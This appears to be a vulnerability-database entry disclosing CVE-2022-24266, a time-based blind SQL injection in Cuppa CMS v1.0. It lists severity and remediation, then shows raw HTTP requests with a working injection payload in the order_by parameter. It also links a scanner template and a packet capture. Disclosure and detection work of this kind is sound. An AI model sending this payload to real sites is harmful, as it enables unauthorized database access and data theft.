| Title | Cuppa CMS v1.0 - SQL injection |
|---|---|
| Author | theamanrawat |
| Severity | High |
| Impact | Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system. |
| Remediation | Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the SQL injection vulnerability. |
| CVSS Score | 7.5 |
| EPSS Score | 0.59035 |
| CVE ID | CVE-2022-24266 |
| CWE ID | CWE-89 |
| Tags | time-based-sqli cve cve2022 sqli cuppa authenticated cuppacms vuln |
Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/table_manager/ via the order_by parameter.
POST / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0
Connection: close
Content-Length: 50
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
user=Jq0Ak3&password=tN9SJm&language=en&task=login
POST /components/table_manager/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Connection: close
Content-Length: 148
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
order_by=id`,if(SUBSTRING('test',1,1)='t',sleep(6),sleep(0))--+-&path=component%2Ftable_manager%2Fview%2Fcu_users&uniqueClass=wrapper_content_919044
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-24266.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-24266.pcap
N/AN/A